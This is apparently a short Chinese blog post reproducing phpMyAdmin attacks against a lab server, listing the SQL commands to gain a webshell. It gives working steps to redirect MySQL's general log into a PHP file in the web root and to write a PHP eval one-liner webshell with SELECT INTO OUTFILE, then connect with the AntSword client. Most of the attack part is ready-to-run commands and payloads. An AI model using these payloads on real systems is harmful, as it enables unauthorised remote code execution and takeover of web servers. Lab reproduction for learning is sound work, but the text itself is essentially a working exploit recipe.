PhPMyadmin-cms漏洞复现

cr.sheeper2024-12-29 20:11

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码 
show global variables like '%general%';
复制代码 
set global general_log='on'; //⽇志保存状态开启;
复制代码 
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码 
show global variables like '%general%';
复制代码 
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码 
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
青岑CTF2 分钟前
攻防世界-Web_php_include-胎教版wp
开发语言·安全·web安全·网络安全·php
188号安全攻城狮2 小时前
【PWN】HappyNewYearCTF_9_ret2syscall
linux·汇编·安全·网络安全·系统安全
青岑CTF3 小时前
moectf2023-了解你的座驾-胎教版wp
安全·web安全·网络安全
刘婉晴4 小时前
【kali渗透测试】中间人攻击
网络安全·渗透测试
小李独爱秋4 小时前
计算机网络经典问题透视:RTS/CTS是强制使用还是选择使用?
网络协议·计算机网络·网络安全·信息与通信·信号处理
瘾大侠4 小时前
HTB赛季10 - Facts
网络·安全·web安全·网络安全
one____dream4 小时前
Reverse-elrond32
安全·网络安全·ctf
小李独爱秋5 小时前
计算机网络经典问题透视:无线局域网MAC协议中的SIFS和DIFS究竟是什么?
网络协议·计算机网络·macos·网络安全·信息与通信·信号处理
code_li17 小时前
“信息安全”与“网络安全”区别
安全·网络安全·信息安全
南棋网络安全19 小时前
windows系统搭建靶场
网络安全
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书04OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)052026美赛A题智能手机电池续航时间预测的连续时间数学模型06Linux下V2Ray安装配置指南07Claude Code Skills 实用使用手册08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09UV安装并设置国内源10在Trae中使用Pencil MCP